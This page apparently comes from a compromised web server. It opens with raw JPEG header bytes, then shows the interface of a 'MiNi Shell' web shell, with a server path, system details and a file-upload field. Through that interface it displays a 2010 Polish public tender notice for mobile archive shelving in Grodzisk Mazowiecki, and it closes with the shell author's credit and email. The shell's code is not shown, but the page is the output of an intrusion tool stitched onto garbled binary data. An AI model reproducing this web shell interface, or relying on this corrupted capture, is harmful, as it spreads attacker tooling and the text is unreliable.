JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100111/6323-N-2010.html

<p class="kh_header"><b>Grodzisk Mazowiecki: Zakup, dostawa i montaż fabrycznie nowych regałów przesuwanych do budynku przy ul. Żyrardowskiej 48 w Grodzisku Maz., na wyposażenie siedziby Wydziału Geodezji, Kartografii i Gospodarki Nieruchomościami Starostwa Powiatu Grodziskiego oraz Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej.</b><br>
<b>Numer ogłoszenia: 6323 - 2010; data zamieszczenia: 11.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatu Grodziskiego , ul. Kościuszki 30, 05-825 Grodzisk Mazowiecki, woj. mazowieckie, tel. 022 022 7241833, 7240711, faks 022 7243049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-grodziski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa i montaż fabrycznie nowych regałów przesuwanych do budynku przy ul. Żyrardowskiej 48 w Grodzisku Maz., na wyposażenie siedziby Wydziału Geodezji, Kartografii i Gospodarki Nieruchomościami Starostwa Powiatu Grodziskiego oraz Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wysokość regałów (od poziomu szyn)	ok.2700 mm
Długość regałów (zgodnie z rysunkiem)		Pomieszczenie 1 - 4400 mm + panel + korba
Pomieszczenie 2 - 3900 mm + panel + korba;
	                              2700 mm + panel
	                              3600 mm+ panel +korba
	                              2200 mm+ panel + korba
Głębokość półek		Pomieszczenie 1 - 300 mm; 350 mm
Pomieszczenie 2 - 300 mm
Ilość poziomów użytkowych 		7 + półka kryjąca
Prześwit między półkami		ok. 340 mm
Grubość półki		ok. 20 mm
Regulacja odległości między półkami		co 15 - 20 mm
Dopuszczalna nośność półek		ok. 60 kg
Mechanizm przesuwny		korbowy
Usztywnienie konstrukcji regałów		krzyżaki
Wypełnienie ścianek bocznych		ścianki stalowe pełne
Kolorystyka regałów		RAL 7035
Rodzaj paneli frontowych		panele stalowe ozdobne
Sposób oznakowania regałów		tabliczki opisowe
Instalacja szyn		szyny montowane nawierzchniowo z najazdami
	
	
	Całkowita długość metrów bieżących półek użytkowych:	922,60 mb
	
		w tym:		POMIESZCZENIE 1				369,60 mb
							półki o gł. 300 mm	308,00 mb
							półki o gł. 350 mm	  61,60 mb
	
				POMIESZCZENIE 2				553,00 mb
	
	
- Regulacja półek co 15 - 20 mm bez konieczności użycia jakichkolwiek narzędzi
- Grubość półek 20 - 25 mm
- Półki gięte trzykrotnie na dłuższych i dwukrotnie na krótszych krawędziach pod kątem prostym co zapewnia odpowiednią ich wytrzymałość, wykonane z blachy o grubości min. 0,8 mm
- Mechanizm przesuwu regału z przekładnią dwustopniową o przełożeniu 1:5 wyposażoną w korbę trójramienną wykonaną z tworzywa sztucznego z uchwytami kulkowymi obracającymi się wokół własnej osi.
- Blokada przesuwu umieszczona po środku korby w każdym z regałów jezdnych.
- Zamek w jednym z regałów jezdnych w bloku
- Regały wyposażone w tabliczki służące do opisywania zawartości aktowej.
- Wszystkie elementy metalowe systemu regałów fosforanowane i pomalowane lakierem proszkowym.
- Wózek jezdny wykonany z profili stalowych walcowanych na zimno o grubości 2 mm zapewniający odpowiednią sztywność
- Elementy łożyskowe mocowane na łożyskach kulkowych zamkniętych
- Ściany boczne regałów wykonane ze stali zimnowalcowanej, odtłuszczone i lakierowane proszkowo, wyposażone w dwa rzędy otworów do mocowania półek
- Stężenia krzyżowe
- Mechanizmy przenoszące napęd z korby na układ jezdny schowane za panelami frontowymi.
- Regały wyposażone w elementy konstrukcyjne zabezpieczające przed niekontrolowanym przechyłem lub przewróceniem.

- Proponowane rozmieszczenie regałów w pomieszczeniu 1 i pomieszczeniu 2 przedstawia załącznik nr 1 do SIWZ.

Dostarczone regały winny  posiadać atest higieniczny, certyfikat bezpieczeństwa, klasyfikacje ogniową, deklaracje zgodności z polską normą..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:


1.	prowadzą działalność gospodarczą w zakresie objętym przedmiotem zamówienia,
2.	posiadają niezbędną wiedzę i doświadczenie do wykonywania zamówienia, tj. wykonywali  dostawy i montaż w zakresie objętym przedmiotem zamówienia,
3.	posiadają niezbędny potencjał techniczny do wykonania zamówienia, 
4.	dysponują osobami zdolnymi do wykonania zamówienia, tj. posiadającymi doświadczenie w wykonywaniu tego rodzaju dostaw i montażu, 
5.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. dysponują środkami gwarantującymi wykonanie zamówienia, 
6.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 Pzp), 
7.	spełnią pozostałe warunki SIWZ tj.:
a)	zaproponują regały zgodne ze specyfikacją SIWZ,
b)zaproponują regały posiadające atest higieniczny, certyfikat bezpieczeństwa,
 klasyfikację ogniową, deklarację zgodności z polską normą,
c)udzielą gwarancji na minimum 2 lata,
d)zaakceptują bez uwag postanowienia zawarte w załączonym projekcie umowy.
Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu  o informacje zwarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 9 niniejszej SIWZ. Z treści załączonych dokumentów i oświadczeń musi jednoznacznie wynikać, że w.w warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z w.w warunków skutkować będzie wykluczeniem Wykonawcy  z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty i oświadczenia :
1.	Wypełniony i podpisany formularz ofertowy (załącznik nr 3 do SIWZ),
2.	Wypełnione i podpisane oświadczenie (załącznik nr 4 do SIWZ),
3.	Oświadczenie, że zaproponowane regały są zgodne ze specyfikacją w SIWZ i spełniają min. parametry przyjęte w specyfikacji,
4.	Opisy techniczne i fotografie proponowanych regałów,
5.	Dokumenty :  atest higieniczny, certyfikat bezpieczeństwa, klasyfikacje ogniową, deklaracje zgodności z polską normą,
6.	Podpisany projekt umowy, każda strona parafowana (załącznik nr 5 do SIWZ);

UWAGA: W przypadku Wykonawców działających wspólnie (konsorcjum) dokumenty wymienione w ust. 9.1. pkt. 2  muszą być złożone przez każdego z członków konsorcjum.
 (poświadczenia za zgodność z oryginałem może dokonać upełnomocniony przedstawiciel Wykonawcy wpisując datę, imię, nazwisko, własnoręczny podpis oraz pieczęć Wykonawcy)
9.2. Zamawiający odrzuci ofertę, jeżeli wystąpią przyczyny wymienione w art. 89 ustawy Prawo zamówień publicznych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.powiat-grodziski.pl/index.php?cmd=przetargi&opt=aktualne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatu Grodziskiego
ul. Kościuszki 30
05-825 Grodzisk Mazowiecki
budynek B pok. 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2010 godzina 12:00, miejsce: Starostwo Powiatu Grodziskiego
ul. Kościuszki 30
05-825 Grodzisk Mazowiecki
w Punkcie obsługi mieszkańców.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com